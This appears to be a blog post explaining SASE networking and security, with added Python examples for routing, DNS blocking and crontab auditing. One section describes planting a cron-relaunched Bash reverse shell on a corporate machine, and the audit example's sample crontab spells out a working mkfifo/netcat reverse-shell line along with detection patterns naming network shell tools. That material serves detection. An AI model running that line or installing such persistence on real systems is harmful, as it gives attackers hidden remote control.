SASE handles all of the complexities of management. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

SASE Definition with Challenge 3: Performance Between Locations

For a single TCP flow, throughput is determined primarily by latency and packet loss, not by bandwidth. So for an optimal experience for global applications, we must manage latency and packet loss end to end, across both the last-mile and the middle-mile segments. Most SD-WAN vendors don’t control these segments, which affects application performance and service agility.

Consequently, constant tweaking at the remote ends will be required to attain the best performance for your application. With SD-WAN, we can bundle transports and perform link bonding to solve the last mile. However, this does not create any benefits for the middle mile bandwidth. MPLS will help you overcome the middle-mile problems, but you will likely pay a high price.
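As an added illustration (not part of the original post) of why latency and loss, rather than link speed, cap a single TCP flow, the Mathis approximation for a loss-limited connection gives

$$\text{throughput} \lesssim \frac{\text{MSS}}{\text{RTT}\,\sqrt{p}}$$

where MSS is the maximum segment size, RTT the round-trip time and p the packet loss rate. With MSS = 1460 bytes, p = 0.1 % and RTT = 100 ms this is about 1460 · 8 / (0.1 · 0.0316) ≈ 3.7 Mbit/s, however fast the access link; at RTT = 20 ms the same loss allows about 18.5 Mbit/s. Shortening the round trip (a nearby PoP) or cutting loss (a controlled middle mile) is what raises a flow's throughput; adding bandwidth on the last mile does not.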

A: Required: How SASE solves this

The SASE cloud already has an optimized converged network and security platforms. Therefore, sites need to connect to the nearest SASE PoP. This way, the sites are placed on the global private backbone to take advantage of global route optimization, dynamic path selection, traffic optimization, and end-to-end encryption. The traffic can also be routed over MPLS, directly between sites (not through the SASE PoP), and from IPsec tunnels to third-party devices. The SASE architecture optimizes the last and middle-mile traffic flows.

B: Required: Optimization techniques:

The SASE global backbone uses several techniques to improve network performance, resulting in predictable, consistent latency and packet loss. The SASE cloud has complete control of each PoP and can employ optimizations: proprietary routing algorithms that factor in latency, packet loss, and jitter, favour performance over cost, and select the optimal route for every packet. Internet routing, by contrast, uses metrics that say nothing about what is best for the application or its traffic type.

Example TCP Performance Parameters.

SASE Definition with Challenge 4: Cloud Agility

Cloud applications are becoming more critical to organizations, even more so than those hosted in private data centers. When delivering cloud resources, we must consider more than just providing connectivity. In the past, when we spoke about agility, we were concerned only with the addition of new on-premises sites.

However, that conversation now has to encompass the cloud. Delivering cloud applications is primarily about providing an application experience as responsive as on-premises. Yet most SD-WAN products are slow to support newly provisioned public cloud infrastructure, and MPLS is expensive, rigid, and not built for cloud access.

A: How SASE solves this

SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity. This further allows the rapid delivery of new public cloud infrastructure.

The SASE PoPs are colocated in the same data centers as the leading IaaS providers, such as Amazon AWS, Microsoft Azure, and Google Cloud Platform, and peer with them directly at Internet exchange points (IXPs). Cloud applications are also optimized through SASE's ability to define egress points.

This lets cloud application traffic exit at the PoP closest to the customer's application instance. The global routing algorithms then determine the best path from anywhere to that instance, giving the cloud application consistent performance regardless of the user's location.

So when we talk about cloud performance with SASE, the claim is that latency to the cloud is comparable to the dedicated access the cloud providers sell themselves, such as AWS Direct Connect or Azure ExpressRoute, without provisioning such a circuit. It is worth validating that claim with your own latency measurements from each site before decommissioning an existing Direct Connect or ExpressRoute circuit.
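To make the contrast between performance-aware backbone routing and cost-driven Internet routing concrete, and to show egress-point selection toward a cloud region, here is an added example in Python. It is not code from the page or from any SASE vendor; the PoP names, link metrics, cost values, and the jitter and loss weights in the scoring formula are all constructed for illustration.

```python
import heapq
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class Link:
    latency_ms: float  # measured one-way latency
    loss_pct: float    # measured packet loss, in percent
    jitter_ms: float   # measured jitter
    cost: float        # relative transit cost, what a cost-driven policy optimises


# Constructed topology (undirected). "pop-*" are SASE PoPs on the private
# backbone, "transit-X" is cheap but congested public transit, and the cloud
# region hangs off the PoP colocated with it.
TOPOLOGY: Dict[Tuple[str, str], Link] = {
    ("site-LON", "pop-LON"): Link(4, 0.0, 0.5, 1),
    ("pop-LON", "pop-NYC"): Link(36, 0.0, 1.0, 5),       # private backbone
    ("pop-LON", "transit-X"): Link(30, 1.5, 8.0, 1),     # cheap, lossy transit
    ("transit-X", "pop-NYC"): Link(25, 0.5, 3.0, 1),
    ("pop-NYC", "aws-us-east-1"): Link(2, 0.0, 0.1, 0),  # PoP-to-cloud cross-connect
}


def neighbours(node: str):
    for (a, b), link in TOPOLOGY.items():
        if a == node:
            yield b, link
        elif b == node:
            yield a, link


def by_cost(link: Link) -> float:
    """Internet-style selection: the cheapest / policy-preferred transit wins."""
    return link.cost


def by_performance(link: Link) -> float:
    """SASE-style selection: latency plus penalties for jitter and loss.
    The weights (2 ms per ms of jitter, 20 ms per percent of loss) are
    constructed for this example, not a vendor's formula."""
    return link.latency_ms + 2 * link.jitter_ms + 20 * link.loss_pct


def best_path(src: str, dst: str, weight: Callable[[Link], float]) -> Tuple[float, List[str]]:
    """Dijkstra over TOPOLOGY with the supplied per-link weight; returns (score, path)."""
    dist = {src: 0.0}
    prev: Dict[str, str] = {}
    heap = [(0.0, src)]
    while heap:
        d, node = heapq.heappop(heap)
        if node == dst:
            break
        if d > dist.get(node, float("inf")):
            continue
        for nxt, link in neighbours(node):
            nd = d + weight(link)
            if nd < dist.get(nxt, float("inf")):
                dist[nxt] = nd
                prev[nxt] = node
                heapq.heappush(heap, (nd, nxt))
    if dst not in dist:
        raise ValueError(f"no path from {src} to {dst}")
    path = [dst]
    while path[-1] != src:
        path.append(prev[path[-1]])
    return dist[dst], path[::-1]


def path_latency_ms(path: List[str]) -> float:
    """Sum of measured latency along a path, the number the user actually feels."""
    total = 0.0
    for a, b in zip(path, path[1:]):
        link = TOPOLOGY.get((a, b)) or TOPOLOGY[(b, a)]
        total += link.latency_ms
    return total


def egress_pop(cloud_region: str) -> str:
    """The PoP directly cross-connected to the cloud region is the egress point."""
    for a, b in TOPOLOGY:
        if a == cloud_region:
            return b
        if b == cloud_region:
            return a
    raise KeyError(cloud_region)


if __name__ == "__main__":
    print("egress PoP for aws-us-east-1:", egress_pop("aws-us-east-1"))
    for name, w in (("cost", by_cost), ("performance", by_performance)):
        score, path = best_path("site-LON", "aws-us-east-1", w)
        print(f"{name:>11}: {' -> '.join(path)}  latency={path_latency_ms(path):.0f} ms")
```

With these constructed numbers the cost-driven policy sends the flow over the lossy transit (61 ms) while the performance-driven one keeps it on the backbone (42 ms); swapping in your own measured PoP-to-PoP metrics is the point of the exercise.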

SASE Definition with Challenge 5: Security

The threat landscape is constantly evolving, so network security must evolve with it on a sound footing. Ransomware and malware have been the primary security concerns from 2020 onward and will remain so. Managing a collection of point solutions, each with its own complex integration points scattered across the network, is a burden for the entire organization.

Security must be part of any WAN transformation initiative. It must protect users and resources regardless of the underlying network and be managed through a single pane of glass. A bundle of non-integrated security products leads to appliance sprawl that weakens the security posture instead of strengthening it. The security solution must defend against emerging threats such as malware and ransomware, and it must make it easier to enforce corporate security policy on mobile users.

Finally, the security solution must also address the increasing cost of buying and managing security appliances and software.

**Security and encryption**

Complexity grows with the number of separate tools needed to cover the different threat vectors. For example, DLP policy may be spread across the SWG, the CASB, and a standalone DLP product, each run by a different team, so the same rule has to be written and kept consistent three times. And what about the impact of encrypted web traffic on the security infrastructure?

Most Internet traffic is now encrypted, and attackers deliver payloads, issue command-and-control instructions, and exfiltrate data over the same encrypted protocols. Organizations cannot decrypt everything: full TLS inspection is expensive, it breaks clients that pin certificates, and it exposes sensitive employee traffic such as banking or health sites that policy, and often law, says must not be inspected. Encrypted-traffic management appliances also scale poorly, which itself becomes a performance problem.

Example Technology: Sensitive Data Protection

Example Technology: Security Backdoors

Backdoor access refers to a hidden method or vulnerability intentionally created within a system or software that allows unauthorized access or control. It is an alternative entry point that bypasses conventional security measures, often undetected.

Using Bash: Bash, short for "Bourne Again SHell," is the default command-line interpreter on most Unix-like systems. Its scripting capabilities make it a favorite of system administrators and developers, but the same versatility lends itself to misuse. This section explains what a Bash backdoor is and how it functions.

Note: In the following, I created a backdoor on a corporate machine to maintain persistence within the environment, using a bash script and a cron job for the system configuration, and then connected to the created backdoor. The aim is to show how tools available on a standard operating-system install are enough to bypass an organization's security controls.

Cron jobs, named after "chronos," the Greek word for time, are scheduled tasks that run automatically in the background on a server. Each crontab entry follows a fixed syntax: five time fields (minute, hour, day of month, month, day of week) that specify when and how often the task runs, followed by the command to execute. Once you know that structure you can create precise, reliable automated processes, and you can also read an unfamiliar crontab and spot entries that should not be there.


First, any existing file named file is removed with rm. Next, mkfifo creates a named pipe (a FIFO) with that name: it looks like a file, but it is really a communications channel between processes. Whatever arrives on the pipe is fed to an interactive shell, and the shell's output is sent to a specific IP address and port by a network client, whose output in turn is written back into the pipe, so commands typed at the remote end reach the shell and their results travel back. The | marks the point at which one Linux command's output is handed to the next. This single line gives a remote user an interactive shell on the machine, a reverse shell, using nothing beyond what a standard install provides.

First, the user's existing crontab is listed, with the error that appears when no crontab exists yet discarded rather than printed. Then the new entry is echoed after it; in this example the schedule is five asterisks, so the backdoor shell is launched every minute, which also means the shell is re-established within a minute of being killed. The combined text is then piped into crontab, which installs it as the user's crontab.
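From the defender's side, the persistence mechanism just described leaves a recognizable footprint in the crontab. The following added example (not the page's own script) audits crontab text for high-frequency or at-boot jobs that wire a shell to the network, and for weaker signs such as hidden paths and world-writable directories. The sample crontab, the indicator regexes, and the scoring weights are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Strong indicators: a shell being wired to the network, the shape of the backdoor above.
INDICATORS = {
    "named_pipe": re.compile(r"\bmkfifo\b"),
    "interactive_shell": re.compile(r"\b(?:ba)?sh\s+-i\b"),
    "dev_tcp": re.compile(r"/dev/(?:tcp|udp)/"),
    "netcat_or_socat": re.compile(r"\b(?:nc|ncat|netcat|socat)\b"),
}
# Weak heuristics: habits that legitimate jobs rarely share. Each adds one point.
HEURISTICS = {
    "world_writable_dir": re.compile(r"(?:^|\s|[;|&=])/(?:tmp|dev/shm|var/tmp)/"),
    "hidden_path": re.compile(r"/\.[A-Za-z0-9_-]+/"),
    "output_discarded": re.compile(r">\s*/dev/null\s+2>&1"),
}
SHORTHAND = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@hourly"}

# Constructed sample crontab: one nightly job, one benign five-minute job,
# the inline reverse shell described in the text, and a hidden at-boot script.
SAMPLE_CRONTAB = """\
# Constructed sample crontab for the audit; not taken from a real host.
MAILTO=root
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * * /usr/lib/monitoring/collect >> /var/log/collect.log
* * * * * rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.0.2.10 4444 > /tmp/f
@reboot /home/svc/.cache/.x/run.sh > /dev/null 2>&1
"""


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    high_frequency: bool
    matched: List[str] = field(default_factory=list)
    score: int = 0


def is_high_frequency(minute_field: str) -> bool:
    """True for '*' or '*/N' with N <= 5, i.e. a job that fires every few minutes."""
    if minute_field == "*":
        return True
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return bool(m) and int(m.group(1)) <= 5


def parse_entry(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a job line; None for blank, comment or VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    parts = s.split(None, 1)
    if parts[0] in SHORTHAND:
        return parts[0], parts[1] if len(parts) > 1 else ""
    fields = s.split(None, 5)
    if len(fields) < 6:
        return None  # malformed; cron would reject it as well
    return " ".join(fields[:5]), fields[5]


def audit_crontab(text: str, threshold: int = 3) -> List[Finding]:
    """Score every job line; return those at or above the threshold, in file order."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parsed = parse_entry(line)
        if parsed is None:
            continue
        schedule, command = parsed
        f = Finding(n, schedule, command, high_frequency=False)
        if schedule == "@reboot":
            f.matched.append("runs_at_boot")
            f.score += 1
        elif schedule not in SHORTHAND and is_high_frequency(schedule.split()[0]):
            f.high_frequency = True
            f.matched.append("high_frequency")
            f.score += 1
        for name, rx in INDICATORS.items():
            if rx.search(command):
                f.matched.append(name)
                f.score += 3
        for name, rx in HEURISTICS.items():
            if rx.search(command):
                f.matched.append(name)
                f.score += 1
        if f.score >= threshold:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} score={f.score} [{', '.join(f.matched)}] {f.schedule} {f.command}")
```

In practice you feed it the output of crontab -l for every user plus the files under /etc/cron.d and /etc/cron.*, and you read the scripts those entries point at, because the network indicators often live in the referenced script rather than in the crontab line itself.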

SASE Definition with Challenge 6: MPLS and SD-WAN

MPLS does not protect resources and users: it provides a private path, not inspection, and it offers nothing at all for users and resources connected over the Internet. SD-WAN offerings, for their part, are not all created equal, since many do not include firewall and threat-protection features covering every edge, namely mobile devices, sites, and cloud resources. This lack of integrated security complicates SD-WAN deployments and often lets malware past the perimeter unnoticed.

Challenge: The cost involved

Security solutions are expensive, and there is never a fixed price. Some security vendors may charge for usage models for which you don’t yet have the quantity. This makes the planning process extraordinarily problematic and complex. As the costs keep increasing, security professionals often trade off point-security solutions due to the associated costs. This is not an effective risk-management strategy.

Security controls for remote workers are also mostly limited to mobile VPN solutions. These are usually coarse, forcing IT to open access to the entire network once a user is connected. Protecting mobile users then requires yet another point solution, such as a next-generation firewall (NGFW) behind the VPN concentrator. In addition, mobile VPN solutions provide no last- or middle-mile optimization.

SASE Meaning: How SASE solves this

SASE converges a complete security stack into the network, bringing granular control to sites, mobile users, and cloud resources by enforcing zero-trust principles at every edge. SASE provides anti-malware protection for both WAN and Internet traffic. For malware detection and prevention, it can combine signature-based and machine-learning-based engines from several integrated anti-malware sources.

For malware communication, SASE can stop the outbound traffic to C&C servers based on reputation feeds and network behavioral analysis. Mobile user traffic is fully protected by SASE’s advanced security services, including NGFW, secure web gateway (SWG), threat prevention, and managed threat detection and response. Furthermore, in the case of mobile, SASE mobile users can dynamically connect to the closest SASE PoP regardless of the location. Again, as discussed previously, the SASE cloud’s relevant optimizations are available for mobile users.

Rethink the WAN: The shift to the cloud, edge computing, and mobility offers new opportunities for IT professionals. Network professionals must rethink their WAN transformation approach to support these digital initiatives. WAN transformation is not just about replacing MPLS with SD-WAN. An all-encompassing solution is needed that provides the proper network performance and security level for enhanced site-to-site connectivity, security, mobile, and cloud.

Example Product: Cisco Umbrella

### What is Cisco Umbrella?

Cisco Umbrella acts as a first line of defense against Internet-based threats by leveraging the cloud. At the DNS layer it blocks requests for malicious domains before a connection is ever established; URL-level and IP-level enforcement come from its proxy and cloud-delivered firewall components. By analyzing patterns across the Internet activity it observes, it can predict and block potential threats, helping keep your network secure.

### Key Features of Cisco Umbrella

1. **DNS Layer Security**: Cisco Umbrella provides a protective shield at the DNS layer, stopping threats before they reach your network or endpoints. This means that harmful requests are blocked at the source, reducing the risk of malware infections.

2. **Secure Web Gateway**: The solution offers a secure web gateway that inspects web traffic and enforces security policies. It ensures that only safe and compliant traffic is allowed, providing an additional layer of security.

3. **Cloud-Delivered Firewall**: Cisco Umbrella includes a built-in firewall to block unwanted traffic, adding another layer of protection. This firewall can be managed from the cloud, simplifying the process of maintaining network security.

4. **Threat Intelligence**: With real-time threat intelligence updates from Cisco Talos, one of the world’s largest commercial threat intelligence teams, Cisco Umbrella ensures that your defenses are always up to date against the latest threats.
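To show what DNS-layer enforcement actually does with a query, here is an added example in Python; it is not Cisco code and does not model Umbrella's own policy engine. The block list, the allow-list exception, the sinkhole address, and the query log lines are constructed for the example. It matches on DNS labels rather than substrings, lets the most specific rule win, and answers blocked A queries with a sinkhole address so the client lands on a block page instead of the malicious host.

```python
from typing import Dict, List

SINKHOLE_A = "192.0.2.1"  # constructed sinkhole address (documentation range)
BLOCKLIST: Dict[str, str] = {   # zone -> category, constructed
    "malware.example": "malware",
    "bad-cdn.example": "command-and-control",
}
ALLOWLIST = {"static.bad-cdn.example"}  # constructed exception under a blocked zone


def normalize(qname: str) -> str:
    """Lowercase, drop the trailing dot, and convert Unicode labels to A-labels."""
    name = qname.rstrip(".").lower()
    try:
        return name.encode("idna").decode("ascii")
    except UnicodeError:
        return name  # leave malformed names as-is; they will simply not match


def candidates(name: str) -> List[str]:
    """All label suffixes of a name, most specific first."""
    labels = name.split(".")
    return [".".join(labels[i:]) for i in range(len(labels))]


def resolve_policy(qname: str, qtype: str = "A") -> dict:
    """Decide a query before it is forwarded; the first (most specific) rule wins."""
    name = normalize(qname)
    for cand in candidates(name):
        if cand in ALLOWLIST:
            return {"action": "resolve", "name": name, "rule": cand, "category": None, "answer": None}
        if cand in BLOCKLIST:
            return {"action": "block", "name": name, "rule": cand, "category": BLOCKLIST[cand],
                    "answer": SINKHOLE_A if qtype == "A" else None}  # non-A blocks get an empty answer
    return {"action": "resolve", "name": name, "rule": None, "category": None, "answer": None}


# Constructed query log: timestamp, client, qname, qtype.
QUERY_LOG = [
    "2024-05-01T09:00:01Z 10.1.1.5 www.shop.example A",
    "2024-05-01T09:00:02Z 10.1.1.5 EVIL.bad-cdn.example. A",
    "2024-05-01T09:00:03Z 10.1.1.7 static.bad-cdn.example A",
    "2024-05-01T09:00:04Z 10.1.1.9 updates.malware.example AAAA",
    "2024-05-01T09:00:05Z 10.1.1.9 notmalware.example A",
]


def blocked_by_client(log: List[str]) -> Dict[str, Dict[str, int]]:
    """Count blocked queries per client and category, the view an analyst pivots on."""
    out: Dict[str, Dict[str, int]] = {}
    for line in log:
        _, client, qname, qtype = line.split()
        d = resolve_policy(qname, qtype)
        if d["action"] == "block":
            per_client = out.setdefault(client, {})
            per_client[d["category"]] = per_client.get(d["category"], 0) + 1
    return out


if __name__ == "__main__":
    for line in QUERY_LOG:
        _, client, qname, qtype = line.split()
        print(client, qname, qtype, "->", resolve_policy(qname, qtype)["action"])
    print(blocked_by_client(QUERY_LOG))
```

Two details matter in production: the sinkhole only helps if the client can reach it and present a block page, and label-based matching is what stops a rule for malware.example from also catching notmalware.example or malware.example.com.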

### Benefits of Using Cisco Umbrella

1. **Simplified Security Management**: Being cloud-based, Cisco Umbrella is easy to deploy and manage. There’s no need for complex hardware or software installations, reducing the burden on IT teams.

2. **Improved Visibility**: Cisco Umbrella provides comprehensive insights into internet activity across all devices and locations. This visibility helps in identifying and responding to potential threats swiftly.

3. **Enhanced User Experience**: Because enforcement happens at DNS resolution time, the common case adds only a DNS lookup to an Umbrella resolver rather than proxying every byte, so most traffic sees no added latency and users get a smooth browsing experience.

4. **Scalability**: Whether you are a small business or a large enterprise, Cisco Umbrella can scale according to your needs. Its cloud-native architecture ensures that it can handle an increasing number of users and devices without compromising on performance.

Summary: SASE Definition

With the ever-evolving landscape of technology and the increasing demand for secure and efficient networks, a new paradigm has emerged in the realm of network security – SASE, which stands for Secure Access Service Edge. In this blog post, we delved into the definition of SASE, its key components, and its transformative impact on network security.

Understanding SASE

SASE, pronounced “sassy,” is a comprehensive framework that combines network security and wide area networking (WAN) capabilities into a single cloud-based service model. It aims to provide users with secure access to applications and data, regardless of their location or the devices they use. By converging networking and security functions, SASE simplifies the network architecture and enhances overall performance.

The Key Components of SASE

To fully grasp the essence of SASE, it is essential to explore its core components. These include:

1. Secure Web Gateway (SWG): The SWG component of SASE ensures safe web browsing by inspecting and filtering web traffic, protecting users from malicious websites, and enforcing internet usage policies.

2. Cloud Access Security Broker (CASB): CASB provides visibility and control over data as it moves between the organization’s network and multiple cloud platforms. It safeguards against cloud-specific threats and helps enforce data loss prevention policies.

3. Firewall-as-a-Service (FWaaS): FWaaS offers scalable and flexible firewall protection, eliminating the need for traditional hardware-based firewalls. It enforces security policies and controls access to applications and data, regardless of their location.

4. Zero Trust Network Access (ZTNA): ZTNA ensures that users and devices are continuously authenticated and authorized before accessing resources. It replaces traditional VPNs with more granular and context-aware access policies, reducing the risk of unauthorized access.

The Benefits of SASE

SASE brings numerous advantages to organizations seeking enhanced network security and performance:

1. Simplified Architecture: By consolidating various network and security functions, SASE eliminates the need for multiple-point solutions, reducing complexity and management overhead.

2. Enhanced Security: With its comprehensive approach, SASE provides robust protection against emerging threats, ensuring data confidentiality and integrity across the network.

3. Improved User Experience: SASE enables secure access to applications and data from any location, offering a seamless user experience without compromising security.

Conclusion:

In conclusion, SASE represents a paradigm shift in network security, revolutionizing how organizations approach their network architecture. By converging security and networking functions, SASE provides a comprehensive and scalable solution that addresses the evolving challenges of today’s digital landscape. Embracing SASE empowers organizations to navigate the complexities of network security and embrace a future-ready approach.